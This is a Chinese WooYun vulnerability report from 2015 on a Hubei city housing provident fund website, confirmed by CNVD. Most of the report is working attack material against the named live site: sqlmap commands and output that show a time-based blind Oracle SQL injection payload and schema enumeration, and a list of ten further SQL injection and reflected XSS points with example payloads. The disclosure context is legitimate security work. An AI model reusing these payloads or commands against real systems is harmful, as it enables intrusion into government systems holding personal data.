漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0131145
漏洞标题:湖北某市住房公积金存在多处严重漏洞(打包提交)
相关厂商:cncert国家互联网应急中心
漏洞作者: 撸至深
提交时间:2015-08-04 21:41
修复时间:2015-09-21 09:54
公开时间:2015-09-21 09:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开
简要描述:
上菜.....
详细说明:
见漏洞证明
漏洞证明:
先把sqlmap跑出来的贴一下吧:
[18:53:46] [INFO] using 'D:\Python27\sqlmap\output\www.xggjj.com\session' as ses
sion file
[18:53:46] [INFO] resuming injection data from session file
[18:53:46] [INFO] resuming back-end DBMS 'oracle' from session file
[18:53:46] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: cardno
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: cardno=420921198709233456') AND 5514=DBMS_PIPE.RECEIVE_MESSAGE(CHR(
65)||CHR(106)||CHR(103)||CHR(86),5) AND ('XoMu'='XoMu&WZMM=123456&code=32157&but
ton=锟结交
---
[18:53:46] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Oracle
[18:53:46] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[18:53:46] [INFO] fetching database (schema) names
[18:53:46] [INFO] fetching number of databases
[18:53:46] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': 1
[18:53:46] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': CTXSYS
available databases [1]:
[*] CTXSYS
[18:53:46] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.xggjj.com'
[*] shutting down at: 18:53:46
D:\Python27\sqlmap>sqlmap.py -u "http://www.xggjj.com/cx/login.asp" --data="card
no=7043987&code=2814355&button=提交&WZMM=9173184" -D CTXSYS --tables
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 18:57:02
[18:57:02] [INFO] using 'D:\Python27\sqlmap\output\www.xggjj.com\session' as ses
sion file
[18:57:02] [INFO] resuming injection data from session file
[18:57:02] [INFO] resuming back-end DBMS 'oracle' from session file
[18:57:02] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: cardno
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: cardno=420921198709233456') AND 5514=DBMS_PIPE.RECEIVE_MESSAGE(CHR(
65)||CHR(106)||CHR(103)||CHR(86),5) AND ('XoMu'='XoMu&WZMM=123456&code=32157&but
ton=锟结交
---
[18:57:02] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Oracle
[18:57:02] [INFO] fetching tables for database 'CTXSYS'
[18:57:02] [INFO] fetching number of tables for database 'CTXSYS'
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': 43
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': DR$CLASS
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': DR$CLASCa
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': DR$OBJECT_ATTRIBUTE
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': DR$OBJECT_ATTRIBUTE_LOV
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': DR$PREFERENCE
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': DR$PREFERENCE_VALUE
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': DR$INDEX
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:02] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:02] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[18:57:05] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:05] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:05] [INFO] retrieved:
[18:57:05] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:05] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:05] [INFO] retrieved:
[18:57:06] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:06] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:06] [INFO] retrieved:
[18:57:07] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:07] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:07] [INFO] retrieved:
[18:57:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': !
[18:57:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:08] [INFO] retrieved:
[18:57:09] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:09] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:09] [INFO] retrieved:
[18:57:09] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:09] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:09] [INFO] retrieved:
[18:57:10] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': A
[18:57:10] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:10] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:10] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:10] [INFO] retrieved:
[18:57:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:11] [INFO] retrieved:
[18:57:12] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:12] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:12] [INFO] retrieved:
[18:57:13] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': A
[18:57:13] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:13] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:13] [INFO] retrieved:
[18:57:13] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:13] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:13] [INFO] retrieved:
[18:57:14] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:14] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:14] [INFO] retrieved:
[18:57:15] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:15] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:15] [INFO] retrieved:
[18:57:16] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:16] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:16] [INFO] retrieved:
[18:57:17] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:17] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:17] [INFO] retrieved:
[18:57:17] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:18] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:18] [INFO] retrieved:
[18:57:18] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:18] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:18] [INFO] retrieved:
[18:57:19] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:19] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:19] [INFO] retrieved:
[18:57:20] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:20] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:20] [INFO] retrieved:
[18:57:21] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n': !
[18:57:21] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:21] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:21] [INFO] retrieved:
[18:57:21] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:21] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:21] [INFO] retrieved:
[18:57:22] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:22] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:22] [INFO] retrieved:
[18:57:23] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:23] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:23] [INFO] retrieved:
[18:57:24] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:24] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:24] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:24] [INFO] retrieved:
[18:57:25] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:25] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:25] [INFO] retrieved:
[18:57:25] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:25] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:25] [INFO] read from file 'D:\Python27\sqlmap\output\www.xggjj.com\sessio
n':
[18:57:25] [INFO] retrieved:
Database: CTXSYS
[43 tables]
+---------------------------+
| "!" |
| "!" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "" |
| "DR$CLASCa" |
| "DR$CLASS" |
| "DR$INDEX" |
| "DR$OBJECT_ATTRIBUTE" |
| "DR$OBJECT_ATTRIBUTE_LOV" |
| "DR$PREFERENCE" |
| "DR$PREFERENCE_VALUE" |
| "\02" |
| "\03" |
| "\11\05" |
| A |
| A |
+---------------------------+
最后跑出来的""这是是神马意思?
不鸟它了,只要证明漏洞确实存在就好了
下面贴其他的洞,就不一一跑了
No. 1
ReferURL http://www.xggjj.com/
ActionURL http://www.xggjj.com/search.asp?KeyWord=99999999
Parameter KeyWord
Vulnerability GET SQL INJECTION BooleanBased Integer
No. 2
ReferURL http://www.xggjj.com/
ActionURL http://www.xggjj.com/search.asp?KeyWord=7030914<img src=0 onerror="alert(4593423)">
Parameter KeyWord
Vulnerability GET XSS Reflected
No. 3
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^WZMM=9173184&code=2814355&button=提交&cardno=99999999
Parameter cardno
Vulnerability POST SQL INJECTION BooleanBased Integer
No. 4
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^WZMM=9173184&code=2814355&button=提交&cardno=7043987
Parameter cardno
Vulnerability POST SQL INJECTION BooleanBased Integer
No. 5
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^cardno=7043987&code=2814355&button=提交&WZMM=99999999
Parameter WZMM
Vulnerability POST SQL INJECTION BooleanBased Integer
No. 6
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^cardno=7043987&code=2814355&button=提交&WZMM=9173184
Parameter WZMM
Vulnerability POST SQL INJECTION BooleanBased Integer
No. 7
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^cardno=7043987&WZMM=9173184&button=提交&code=99999999
Parameter code
Vulnerability POST SQL INJECTION BooleanBased Integer
No. 8
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^cardno=7043987&WZMM=9173184&button=提交&code=2814355
Parameter code
Vulnerability POST SQL INJECTION BooleanBased Integer
No. 9
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^cardno=7043987&WZMM=9173184&code=2814355&button=99999999
Parameter button
Vulnerability POST SQL INJECTION BooleanBased String
No. 10
ReferURL http://www.xggjj.com/wsbs.asp
ActionURL http://www.xggjj.com/cx/login.asp^cardno=7043987&WZMM=9173184&code=2814355&button=提交
Parameter button
Vulnerability POST SQL INJECTION BooleanBased Integer
修复方案:
漏洞修复方式请@我大乌云大牛@路人甲
版权声明:转载请注明来源 撸至深@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-08-07 09:53
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置。
最新状态:
暂无